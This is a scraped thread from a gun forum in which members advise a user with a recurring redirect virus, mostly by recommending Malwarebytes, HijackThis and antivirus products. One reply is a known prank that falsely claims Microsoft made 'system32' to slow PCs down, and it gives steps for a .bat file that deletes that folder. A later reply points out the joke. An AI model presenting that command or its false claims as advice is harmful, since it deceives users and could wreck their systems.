• View up to date on firearm-related events
  • Share photos & video with other members
  • ...and so much more!
  • Fred78

Plinker
    Rating - 0%
    0   0   0
    Jan 16, 2013
    To the headman in charge almost every day when I get on this site my computor is attacked by a trojen virus

fallenangel1

Sharpshooter
    Rating - 0%
    0   0   0
    Jan 26, 2013
    Its Trojan .. and I would venture a guess that your computer is already infected and you only notice it when you attempt to access the internet.

Possibly something like a "redirect" .. Say you try to go to Google and the virus attempts to redirect your PC to Big-ones-xxx.com .. Your virus scanners can see that and trigger an alarm. Its not Googles fault, its a hidden virus on your PC. Try running a full system scan with something like Malwarebytes (Download it here) and see if anything pops up.

BogWalker

Grandmaster
    Rating - 100%
    6   0   0
    Jan 5, 2013
    Second on Malwarebytes. If it won't let you access their site, I had a virus like that once, get on a different PC and load it onto a flashdrive and try that. If that fails try a system restore and then get Malwarebytes and run routine scans to prevent future problems.

Fred78

Plinker
    Rating - 0%
    0   0   0
    Jan 16, 2013
    I've had the computor in the shop 2 times in the last few months. The malware stops the virus but sometimes it can't seem to get rid of right away. The old gent that works on it said it was a redirect type thing. If it keeps messing with the machine I'll get a Mack

sepe

Grandmaster
    Rating - 100%
    1   0   0
    Jun 15, 2010
    Accra, Ghana
    I've had the computor in the shop 2 times in the last few months. The malware stops the virus but sometimes it can't seem to get rid of right away. The old gent that works on it said it was a redirect type thing. If it keeps messing with the machine I'll get a Mack

It won't fully get rid of all traces of browser redirects. You've, usually, got to take care of that yourself by researching removal methods for the particular malware.

Not sure what kind you've been looking at but I'm a big fan of this style...

6rum.jpg

steveh_131

Grandmaster
    Rating - 0%
    0   0   0
    Mar 3, 2009
    Porter County
    Protip:

Interesting fact-- When Microsoft was first getting started, they knew they wouldn't make enough money from the profits of their operating system. Everybody knows people pirate Windows, so they had to get creative. A guy named Chris Liddel came up with the idea to put a folder called "system32" in the Windows folder that literally slows down your your machine-- on purpose.

"system32" holds 32 GIGABYTES of deleted files, internet history, uninstalled programs, and other worthless items that intentionally clogs up your machine. Why did they do it? Because Microsoft owns several PC "cleaning" tools like TuneUp Utilities, Norton Antivirus, etc. More money for them. Here's how to beat the system (no pun intended):

1. Open Notepad

2. Type the following text:

@echo off
    del C::\\WINDOWS\system32

3. Save as "speedup.bat" and put it on your desktop (be sure to select "All Files" instead of "Text Document" in the drop-down bar underneath the text bar)

4. Double-click the .bat file

5. Reboot, and your PC is twice as fast.

printcraft

INGO Clown
    Site Supporter
    Rating - 100%
    16   0   0
    Feb 14, 2008
    Uranus
    T556o th636e he73adm7636an i654n c15ha63rge al73m678o2st ev73e637ry d377a37y w37h7537en I g37et o7777n th3899is si266te m66y co266mp7738utor i58s att4488ac48ked b8y a tr68oj48en vir4822us

I'v783e h363ad th5484e co48mpu484tor i458n t8648he s8456hop 10 ti84568mes win ttehe uue4 fe437w mo77nths. Th753e mal838wa83re st838ops t777he vi1515rus b7367ut so748meti457mes i774t ca7468n't s8486ee84m t848o g84992et ri27d 8of righ883t aw3366ay. Th785e o95ld ge9955nt th563at w254orks o75n i7t sa777id i6t w77as a red3654634irect ty373pe thi88ng. I63f 66it kee58484ps m484essing w645845ith th888e ma458chin49e I'4467ll g747et a Ma746ck

I can't figure out what is going on with your posts.... they all look like this.... I would fire that computor guy, you still have that computor virus.

:dunno:

Like the other posters said... get a Mack. They won't let you down.

fallenangel1

Sharpshooter
    Rating - 0%
    0   0   0
    Jan 26, 2013

Its a good thing the syntax is incorrect or you could fool some innocent user into trying to run that.

To the OP .. if you have had the PC looked at and the problems comes back then they didn't finish the job. Or you (or whomever else uses the PC) is going back to the same sites or installing the same hacked software and re-infecting the PC each time.

92ThoStro

Master
    Rating - 100%
    3   0   0
    Dec 1, 2012
    What antivirus do you use?
    You need to get rid of Norton and get Microsoft Security Essentials
    If you are having redirect or other active problems you need to download, run, and save a log file in "Hijack This" then go to google and type in "highjack this log file analyzer wusertang" and let their tool analyze your log.
    Whatever active problem you are having, it will find it, and you can disable it.
    Then go ahead and clean it out with your a full system scan from Security Essentials or Mbytes

sepe

Grandmaster
    Rating - 100%
    1   0   0
    Jun 15, 2010
    Accra, Ghana
    What antivirus do you use?
    You need to get rid of Norton and get Microsoft Security Essentials
    If you are having redirect or other active problems you need to download, run, and save a log file in "Hijack This" then go to google and type in "highjack this log file analyzer wusertang" and let their tool analyze your log.
    Whatever active problem you are having, it will find it, and you can disable it.
    Then go ahead and clean it out with your a full system scan from Security Essentials or Mbytes

For some reason, Norton (actually Symantec Endpoint Protection) has always done a better job for me than MSE. MSE and Avast let key generators and cracks stay without even a warning...I mean if there were key gens or cracks on my computer.

92ThoStro

Master
    Rating - 100%
    3   0   0
    Dec 1, 2012
    I always thought it was annoying when Norton and Avast yelled at me about those... duh I know they are there.

But really you wont get a virus if you use your computer properly. If you watch too many " videos " and open all your email attachments from spam mail, you might need a heavy hitter. I would rather get Kaspersky than any more of Symantecs suff. Granted I was on Vista back then and only had 2 gigs of ram. I'm sure Norton wouldn't be as bad on Win 7 with my 8 gigs of ram. It's a resource hog, and is too intrusive, and you have to download a separate utility just to uninstall it completely, otherwise it leaves "residue" all over your computer if you use the provided " uninstall " feature.

92ThoStro

Master
    Rating - 100%
    3   0   0
    Dec 1, 2012
    I always thought it was annoying when Norton and Avast yelled at me about those... duh I know they are there.

But really you wont get a virus if you use your computer properly. If you watch too many " videos " and open all your email attachments from spam mail, you might need a heavy hitter. I would rather get Kaspersky than any more of Symantecs suff. Granted I was on Vista back then and only had 2 gigs of ram. I'm sure Norton wouldn't be as bad on Win 7 with my 8 gigs of ram. It's a resource hog, and is too intrusive, and you have to download a separate utility just to uninstall it completely, otherwise it leaves "residue" all over your computer if you use the provided " uninstall " feature.

Top Bottom